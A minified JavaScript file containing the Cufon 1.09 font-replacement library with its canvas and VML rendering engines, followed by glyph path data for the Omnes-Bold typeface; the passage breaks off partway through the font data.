/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());

/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Copyright (c) 2005-2006 by Joshua Darden, Inc. All rights reserved.
 * 
 * Trademark:
 * Please refer to the Copyright section for the font trademark attribution
 * notices.
 * 
 * Full name:
 * Omnes-Bold
 * 
 * Manufacturer:
 * by Joshua Darden, Inc
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"105,5v-59,0,-97,-37,-97,-94v0,-56,39,-93,98,-93v58,0,97,37,97,93v0,57,-39,94,-98,94xm105,-48v22,0,39,-18,39,-41v0,-24,-16,-41,-39,-41v-23,0,-38,17,-38,41v0,24,15,41,38,41","w":210},{"d":"123,-86r36,-115v7,-24,23,-34,39,-34v23,0,45,19,42,25r-76,185v-11,36,-68,36,-83,0r-79,-185v-3,-6,21,-25,45,-25v18,0,34,13,40,34","w":242},{"d":"33,0v-33,0,-30,-42,-12,-55r64,-72v-32,-3,-75,12,-75,-27v0,-16,9,-25,26,-25r111,0v33,0,27,40,12,56r-66,71v33,4,82,-14,82,27v0,16,-9,25,-26,25r-116,0","w":182},{"d":"56,-195v3,-17,2,-47,24,-43v20,-3,19,26,22,43v18,-2,46,-13,48,9v9,19,-21,26,-33,34v7,14,25,39,7,51v-19,12,-35,-15,-46,-24v-11,10,-27,36,-46,23v-18,-12,2,-37,8,-50v-12,-8,-42,-14,-33,-35v3,-22,31,-9,49,-8","w":155},{"d":"114,0v-46,0,-98,4,-98,-40r0,-153v-1,-51,54,-40,100,-40v77,0,123,44,123,115v0,72,-48,118,-125,118xm88,-61v47,4,80,-10,80,-56v0,-45,-33,-59,-80,-55r0,111","w":248},{"d":"199,-163v0,73,-95,67,-121,105v43,6,126,-19,123,30v0,18,-9,28,-34,28r-113,0v-39,2,-44,-12,-44,-49v0,-41,41,-63,72,-77v27,-13,48,-19,48,-33v0,-15,-10,-23,-30,-23v-24,0,-38,19,-42,37v0,1,-47,3,-47,-32v0,-35,33,-61,93,-61v62,0,95,28,95,75","w":207},{"d":"48,0v-51,1,-39,-49,-18,-73r88,-100v-40,-5,-104,18,-104,-31v0,-20,11,-29,32,-29r130,0v51,-1,39,50,18,73r-91,100v42,6,112,-20,112,32v0,20,-11,28,-32,28r-135,0","w":223},{"d":"109,72v-44,0,-92,9,-92,-40r0,-229v-3,-48,47,-40,91,-40v24,0,33,7,33,28v0,29,-31,28,-61,27r0,199v30,0,62,-4,62,28v0,19,-10,27,-33,27","w":146},{"d":"92,4v-18,2,-30,8,-30,17v0,9,10,14,33,14v23,0,34,-6,34,-15v0,-9,-16,-12,-37,-16xm96,-90v15,0,25,-10,25,-25v0,-15,-10,-25,-25,-25v-14,0,-25,10,-25,25v0,15,10,25,25,25xm129,-177v7,-16,20,-34,37,-34v24,0,34,27,32,28r-31,29v41,47,2,104,-68,103v0,9,18,9,44,16v25,7,51,22,51,53v0,35,-36,58,-99,58v-68,0,-98,-15,-98,-50v0,-23,21,-39,54,-43v-12,-13,-5,-32,10,-39v-33,-8,-52,-29,-52,-58v0,-49,64,-81,120,-63","w":194},{"d":"52,-199v-23,0,-37,-12,-37,-32v0,-20,14,-33,36,-33v23,0,38,13,38,33v0,20,-15,32,-37,32xm21,72v-48,9,-59,-45,-36,-61v9,11,32,13,32,-8r0,-150v1,-28,15,-34,38,-33v19,0,31,7,31,33v0,87,32,222,-65,219","w":102},{"d":"70,-66v-30,0,-69,4,-65,-27v-3,-26,37,-24,65,-23v0,-31,-6,-71,29,-66v26,-2,24,38,23,66v29,0,69,-4,65,26v3,27,-37,25,-65,24v0,31,5,73,-29,67v-28,2,-23,-39,-23,-67","w":192},{"d":"76,-170v-35,0,-72,5,-72,-33v0,-20,11,-30,33,-30r149,0v22,0,34,10,34,31v0,36,-37,33,-72,32r0,138v0,26,-15,34,-42,34v-20,0,-30,-12,-30,-34r0,-138","w":222},{"d":"85,-74v1,38,5,76,-38,76v-18,0,-31,-8,-31,-34r0,-214v25,-14,69,-10,69,45r0,94v20,-24,35,-74,72,-74v21,0,40,17,37,21r-47,68r52,74v2,4,-17,21,-38,21v-40,-2,-55,-52,-76,-77","w":201},{"w":61},{"d":"82,-92v-23,-13,-70,-26,-70,-56v0,-17,13,-34,16,-32r104,57v24,10,24,50,0,63r-104,56v-3,1,-17,-13,-17,-31v-1,-29,49,-44,71,-57","w":163},{"d":"36,-126v-24,1,-35,-6,-35,-29v0,-17,13,-26,35,-24v-1,-57,28,-76,68,-76v56,0,60,44,38,60v-12,-13,-45,-14,-39,16v26,-2,43,3,43,29v0,20,-17,26,-41,24v-7,47,24,128,-38,128v-49,0,-26,-83,-31,-128","w":149},{"d":"68,-107r66,0v0,-42,-65,-37,-66,0xm69,-71v5,38,74,33,85,5v0,-1,31,3,31,29v0,24,-28,42,-78,42v-61,0,-99,-34,-99,-92v0,-55,40,-95,95,-95v56,1,95,38,93,93v0,10,-4,18,-14,18r-113,0","w":202},{"d":"87,68v-20,0,-39,-15,-37,-19r30,-62v-8,-2,-15,-6,-18,-13r-59,-135v-1,-4,18,-20,38,-20v41,0,47,76,63,109v16,-34,20,-109,61,-109v20,0,39,16,38,20r-79,198v-9,23,-22,31,-37,31","w":205},{"d":"70,-77v-4,27,-46,27,-46,-1v0,-50,59,-49,85,-18v5,-28,46,-29,46,1v0,50,-59,49,-85,18","w":179},{"d":"53,0v-24,0,-37,-14,-37,-40r0,-153v0,-26,13,-40,37,-40r124,0v24,0,35,11,34,32v0,48,-78,24,-122,30r0,24v36,3,97,-12,92,29v3,40,-55,27,-92,29r0,27v44,6,124,-19,123,30v0,20,-10,32,-33,32r-126,0","w":221},{"d":"100,5v-68,0,-93,-24,-93,-48v0,-17,22,-36,24,-34v15,14,44,27,69,27v22,0,32,-6,32,-18v0,-14,-19,-15,-42,-20v-39,-8,-78,-24,-78,-73v0,-48,36,-77,100,-77v61,0,87,21,87,44v0,20,-24,37,-25,36v-15,-14,-40,-25,-62,-25v-21,0,-31,6,-31,18v0,13,19,13,43,18v46,10,81,30,81,73v0,51,-35,79,-105,79","w":211},{"d":"159,0v-55,0,-143,24,-143,-40r0,-161v0,-26,14,-34,41,-34v21,0,32,12,32,34r0,138v41,3,106,-15,104,31v0,21,-12,32,-34,32","w":198},{"d":"112,-45v21,0,33,-12,33,-27v0,-16,-12,-27,-33,-27v-21,0,-34,11,-34,27v0,15,13,27,34,27xm112,-139v18,0,30,-11,30,-25v0,-14,-12,-25,-30,-25v-18,0,-31,10,-31,25v0,14,13,25,31,25xm53,-120v-26,-9,-38,-26,-38,-51v0,-41,39,-68,97,-68v89,0,130,87,58,119v31,10,45,29,45,56v0,42,-39,68,-104,68v-105,0,-140,-93,-58,-124","w":223},{"d":"38,35v-13,13,-41,2,-35,-16v11,-32,1,-81,51,-81v33,0,31,43,12,65","w":93},{"d":"90,-191v-9,21,-22,33,-37,33v-13,0,-23,-9,-23,-21v0,-25,38,-49,60,-55v22,6,59,30,59,55v0,12,-9,21,-22,21v-15,0,-28,-12,-37,-33","w":180},{"d":"128,-93v17,1,18,-15,17,-32v-9,-17,-36,-11,-36,12v0,13,8,20,19,20xm134,-18v35,0,54,-18,77,-30v10,0,15,15,14,16v-21,23,-52,37,-91,37v-73,0,-122,-50,-122,-122v0,-71,50,-121,122,-121v78,0,120,48,120,106v0,66,-75,95,-105,50v-18,42,-87,17,-80,-31v-3,-49,53,-73,79,-38v4,-19,30,-18,39,-11v3,24,-10,76,16,74v12,0,26,-10,26,-43v0,-43,-28,-84,-95,-84v-58,0,-97,41,-97,98v0,57,39,99,97,99","w":264},{"d":"52,-199v-23,0,-37,-12,-37,-32v0,-20,14,-33,36,-33v23,0,38,13,38,33v0,20,-15,32,-37,32xm56,2v-24,1,-38,-5,-39,-34r0,-115v1,-28,15,-34,38,-33v19,0,31,7,31,33r0,115v0,25,-12,34,-30,34","w":102},{"d":"82,-149v7,-42,87,-44,81,4v-5,47,-20,32,-47,27v-61,-10,6,120,-69,120v-18,0,-31,-8,-31,-34r0,-140v16,-13,61,-13,66,23","w":168},{"d":"145,-60v-15,-11,-23,-38,-5,-51v15,-11,34,-4,44,11v9,-39,-12,-75,-50,-74v-33,0,-54,24,-54,58v0,37,26,63,65,56xm234,-50r29,31v1,2,-14,24,-40,24v-10,0,-21,-4,-34,-14v-84,42,-180,-16,-180,-108v0,-71,51,-121,123,-121v99,0,156,108,102,188","w":263},{"d":"35,-126v-21,1,-32,-8,-32,-28v0,-17,11,-26,32,-25v-2,-32,5,-54,37,-50v24,-3,34,19,31,50v26,-1,51,0,47,28v2,24,-22,27,-48,25v4,26,-12,74,15,77v9,0,14,-4,19,-10v33,21,11,64,-38,64v-69,0,-65,-64,-63,-131","w":158},{"d":"66,-135v-1,23,-40,22,-40,0v-1,-38,-40,-101,20,-101v62,0,21,64,20,101","w":92},{"d":"99,-55v-13,21,-22,59,-54,58v-22,0,-43,-18,-40,-22r50,-70r-49,-71v3,-17,63,-36,74,1r20,35v13,-20,25,-57,54,-57v22,0,42,18,40,21r-49,71r49,70v3,4,-17,22,-41,22v-30,0,-39,-39,-54,-58","w":200},{"d":"124,-21v-7,31,-63,33,-72,5r-48,-145v-1,-4,23,-20,42,-20v13,0,27,5,31,26r15,85v17,-34,9,-96,57,-96v45,0,37,61,52,93r15,-82v4,-45,68,-19,72,-6r-48,145v-12,29,-63,23,-72,-5r-22,-69","w":291},{"d":"85,-150v11,-18,28,-32,56,-32v75,2,63,79,63,150v-1,28,-14,34,-37,34v-43,0,-30,-60,-32,-100v0,-18,-9,-28,-23,-28v-63,-3,15,128,-65,128v-18,0,-31,-8,-31,-34r0,-214v25,-14,72,-10,69,45r0,51","w":218},{"d":"150,-26v-8,38,-73,38,-84,0r-55,-184v-1,-3,14,-24,45,-24v14,0,33,8,39,39r20,100r24,-91v7,-35,69,-34,78,0r25,91r19,-102v5,-28,23,-37,40,-37v29,0,43,20,42,24r-53,184v-7,38,-74,38,-85,0r-28,-96","w":353},{"d":"41,72v-34,7,-47,-42,-25,-52v37,-3,48,-25,51,-78r43,-25r-43,-24v-